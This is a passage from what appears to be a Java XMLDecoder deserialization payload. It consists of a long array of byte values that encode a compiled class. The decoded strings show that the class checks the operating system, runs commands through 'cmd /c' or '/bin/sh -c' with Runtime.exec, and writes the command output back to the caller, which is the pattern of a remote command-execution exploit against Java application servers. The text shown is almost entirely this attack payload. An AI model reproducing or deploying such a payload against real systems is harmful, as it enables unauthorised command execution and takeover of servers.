index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void index=\"3006\"><byte>117</byte></void><void index=\"3007\"><byte>116</byte></void><void index=\"3008\"><byte>83</byte></void><void index=\"3009\"><byte>116</byte></void><void index=\"3010\"><byte>114</byte></void><void index=\"3011\"><byte>101</byte></void><void index=\"3012\"><byte>97</byte></void><void index=\"3013\"><byte>109</byte></void><void index=\"3014\"><byte>59</byte></void><void index=\"3015\"><byte>76</byte></void><void index=\"3016\"><byte>106</byte></void><void index=\"3017\"><byte>97</byte></void><void index=\"3018\"><byte>118</byte></void><void index=\"3019\"><byte>97</byte></void><void index=\"3020\"><byte>47</byte></void><void index=\"3021\"><byte>108</byte></void><void index=\"3022\"><byte>97</byte></void><void index=\"3023\"><byte>110</byte></void><void index=\"3024\"><byte>103</byte></void><void index=\"3025\"><byte>47</byte></void><void index=\"3026\"><byte>83</byte></void><void index=\"3027\"><byte>116</byte></void><void index=\"3028\"><byte>114</byte></void><void index=\"3029\"><byte>105</byte></void><void index=\"3030\"><byte>110</byte></void><void index=\"3031\"><byte>103</byte></void><void index=\"3032\"><byte>59</byte></void><void index=\"3033\"><byte>41</byte></void><void index=\"3034\"><byte>86</byte></void><void index=\"3035\"><byte>12</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>10</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>-110</byte></void><void index=\"3040\"><byte>10</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>-117</byte></void><void index=\"3043\"><byte>0</byte></void><void index=\"3044\"><byte>-109</byte></void><void index=\"3045\"><byte>1</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>19</byte></void><void index=\"3048\"><byte>40</byte></void><void index=\"3049\"><byte>76</byte></void><void index=\"3050\"><byte>106</byte></void><void index=\"3051\"><byte>97</byte></void><void index=\"3052\"><byte>118</byte></void><void index=\"3053\"><byte>97</byte></void><void index=\"3054\"><byte>47</byte></void><void index=\"3055\"><byte>105</byte></void><void index=\"3056\"><byte>111</byte></void><void index=\"3057\"><byte>47</byte></void><void index=\"3058\"><byte>82</byte></void><void index=\"3059\"><byte>101</byte></void><void index=\"3060\"><byte>97</byte></void><void index=\"3061\"><byte>100</byte></void><void index=\"3062\"><byte>101</byte></void><void index=\"3063\"><byte>114</byte></void><void index=\"3064\"><byte>59</byte></void><void index=\"3065\"><byte>41</byte></void><void index=\"3066\"><byte>86</byte></void><void index=\"3067\"><byte>12</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>10</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>-107</byte></void><void index=\"3072\"><byte>10</byte></void><void index=\"3073\"><byte>0</byte></void><void index=\"3074\"><byte>-119</byte></void><void index=\"3075\"><byte>0</byte></void><void index=\"3076\"><byte>-106</byte></void><void index=\"3077\"><byte>1</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>0</byte></void><void index=\"3080\"><byte>8</byte></void><void index=\"3081\"><byte>0</byte></void><void index=\"3082\"><byte>-104</byte></void><void index=\"3083\"><byte>1</byte></void><void index=\"3084\"><byte>0</byte></void><void index=\"3085\"><byte>8</byte></void><void index=\"3086\"><byte>114</byte></void><void index=\"3087\"><byte>101</byte></void><void index=\"3088\"><byte>97</byte></void><void index=\"3089\"><byte>100</byte></void><void index=\"3090\"><byte>76</byte></void><void index=\"3091\"><byte>105</byte></void><void index=\"3092\"><byte>110</byte></void><void index=\"3093\"><byte>101</byte></void><void index=\"3094\"><byte>12</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>-102</byte></void><void index=\"3097\"><byte>0</byte></void><void index=\"3098\"><byte>90</byte></void><void index=\"3099\"><byte>10</byte></void><void index=\"3100\"><byte>0</byte></void><void index=\"3101\"><byte>-119</byte></void><void index=\"3102\"><byte>0</byte></void><void index=\"3103\"><byte>-101</byte></void><void index=\"3104\"><byte>1</byte></void><void index=\"3105\"><byte>0</byte></void><void index=\"3106\"><byte>9</byte></void><void index=\"3107\"><byte>103</byte></void><void index=\"3108\"><byte>101</byte></void><void index=\"3109\"><byte>116</byte></void><void index=\"3110\"><byte>87</byte></void><void index=\"3111\"><byte>114</byte></void><void index=\"3112\"><byte>105</byte></void><void index=\"3113\"><byte>116</byte></void><void index=\"3114\"><byte>101</byte></void><void index=\"3115\"><byte>114</byte></void><void index=\"3116\"><byte>1</byte></void><void index=\"3117\"><byte>0</byte></void><void index=\"3118\"><byte>23</byte></void><void index=\"3119\"><byte>40</byte></void><void index=\"3120\"><byte>41</byte></void><void index=\"3121\"><byte>76</byte></void><void index=\"3122\"><byte>106</byte></void><void index=\"3123\"><byte>97</byte></void><void index=\"3124\"><byte>118</byte></void><void index=\"3125\"><byte>97</byte></void><void index=\"3126\"><byte>47</byte></void><void index=\"3127\"><byte>105</byte></void><void index=\"3128\"><byte>111</byte></void><void index=\"3129\"><byte>47</byte></void><void index=\"3130\"><byte>80</byte></void><void index=\"3131\"><byte>114</byte></void><void index=\"3132\"><byte>105</byte></void><void index=\"3133\"><byte>110</byte></void><void index=\"3134\"><byte>116</byte></void><void index=\"3135\"><byte>87</byte></void><void index=\"3136\"><byte>114</byte></void><void index=\"3137\"><byte>105</byte></void><void index=\"3138\"><byte>116</byte></void><void index=\"3139\"><byte>101</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>59</byte></void><void index=\"3142\"><byte>12</byte></void><void index=\"3143\"><byte>0</byte></void><void index=\"3144\"><byte>-99</byte></void><void index=\"3145\"><byte>0</byte></void><void index=\"3146\"><byte>-98</byte></void><void index=\"3147\"><byte>10</byte></void><void index=\"3148\"><byte>0</byte></void><void index=\"3149\"><byte>69</byte></void><void index=\"3150\"><byte>0</byte></void><void index=\"3151\"><byte>-97</byte></void><void index=\"3152\"><byte>1</byte></void><void index=\"3153\"><byte>0</byte></void><void index=\"3154\"><byte>19</byte></void><void index=\"3155\"><byte>106</byte></void><void index=\"3156\"><byte>97</byte></void><void index=\"3157\"><byte>118</byte></void><void index=\"3158\"><byte>97</byte></void><void index=\"3159\"><byte>47</byte></void><void index=\"3160\"><byte>105</byte></void><void index=\"3161\"><byte>111</byte></void><void index=\"3162\"><byte>47</byte></void><void index=\"3163\"><byte>80</byte></void><void index=\"3164\"><byte>114</byte></void><void index=\"3165\"><byte>105</byte></void><void index=\"3166\"><byte>110</byte></void><void index=\"3167\"><byte>116</byte></void><void index=\"3168\"><byte>87</byte></void><void index=\"3169\"><byte>114</byte></void><void index=\"3170\"><byte>105</byte></void><void index=\"3171\"><byte>116</byte></void><void index=\"3172\"><byte>101</byte></void><void index=\"3173\"><byte>114</byte></void><void index=\"3174\"><byte>7</byte></void><void index=\"3175\"><byte>0</byte></void><void index=\"3176\"><byte>-95</byte></void><void index=\"3177\"><byte>1</byte></void><void index=\"3178\"><byte>0</byte></void><void index=\"3179\"><byte>5</byte></void><void index=\"3180\"><byte>119</byte></void><void index=\"3181\"><byte>114</byte></void><void index=\"3182\"><byte>105</byte></void><void index=\"3183\"><byte>116</byte></void><void index=\"3184\"><byte>101</byte></void><void index=\"3185\"><byte>12</byte></void><void index=\"3186\"><byte>0</byte></void><void index=\"3187\"><byte>-93</byte></void><void index=\"3188\"><byte>0</byte></void><void index=\"3189\"><byte>71</byte></void><void index=\"3190\"><byte>10</byte></void><void index=\"3191\"><byte>0</byte></void><void index=\"3192\"><byte>-94</byte></void><void index=\"3193\"><byte>0</byte></void><void index=\"3194\"><byte>-92</byte></void><void index=\"3195\"><byte>1</byte></void><void index=\"3196\"><byte>0</byte></void><void index=\"3197\"><byte>19</byte></void><void index=\"3198\"><byte>106</byte></void><void index=\"3199\"><byte>97</byte></void><void index=\"3200\"><byte>118</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>47</byte></void><void index=\"3203\"><byte>108</byte></void><void index=\"3204\"><byte>97</byte></void><void index=\"3205\"><byte>110</byte></void><void index=\"3206\"><byte>103</byte></void><void index=\"3207\"><byte>47</byte></void><void index=\"3208\"><byte>69</byte></void><void index=\"3209\"><byte>120</byte></void><void index=\"3210\"><byte>99</byte></void><void index=\"3211\"><byte>101</byte></void><void index=\"3212\"><byte>112</byte></void><void index=\"3213\"><byte>116</byte></void><void index=\"3214\"><byte>105</byte></void><void index=\"3215\"><byte>111</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>7</byte></void><void index=\"3218\"><byte>0</byte></void><void index=\"3219\"><byte>-90</byte></void><void index=\"3220\"><byte>1</byte></void><void index=\"3221\"><byte>0</byte></void><void index=\"3222\"><byte>3</byte></void><void index=\"3223\"><byte>111</byte></void><void index=\"3224\"><byte>117</byte></void><void index=\"3225\"><byte>116</byte></void><void index=\"3226\"><byte>1</byte></void><void index=\"3227\"><byte>0</byte></void><void index=\"3228\"><byte>21</byte></void><void index=\"3229\"><byte>76</byte></void><void index=\"3230\"><byte>106</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>118</byte></void><void index=\"3233\"><byte>97</byte></void><void index=\"3234\"><byte>47</byte></void><void index=\"3235\"><byte>105</byte></void><void index=\"3236\"><byte>111</byte></void><void index=\"3237\"><byte>47</byte></void><void index=\"3238\"><byte>80</byte></void><void index=\"3239\"><byte>114</byte></void><void index=\"3240\"><byte>105</byte></void><void index=\"3241\"><byte>110</byte></void><void index=\"3242\"><byte>116</byte></void><void index=\"3243\"><byte>83</byte></void><void index=\"3244\"><byte>116</byte></void><void index=\"3245\"><byte>114</byte></void><void index=\"3246\"><byte>101</byte></void><void index=\"3247\"><byte>97</byte></void><void index=\"3248\"><byte>109</byte></void><void index=\"3249\"><byte>59</byte></void><void index=\"3250\"><byte>12</byte></void><void index=\"3251\"><byte>0</byte></void><void index=\"3252\"><byte>-88</byte></void><void index=\"3253\"><byte>0</byte></void><void index=\"3254\"><byte>-87</byte></void><void index=\"3255\"><byte>9</byte></void><void index=\"3256\"><byte>0</byte></void><void index=\"3257\"><byte>107</byte></void><void 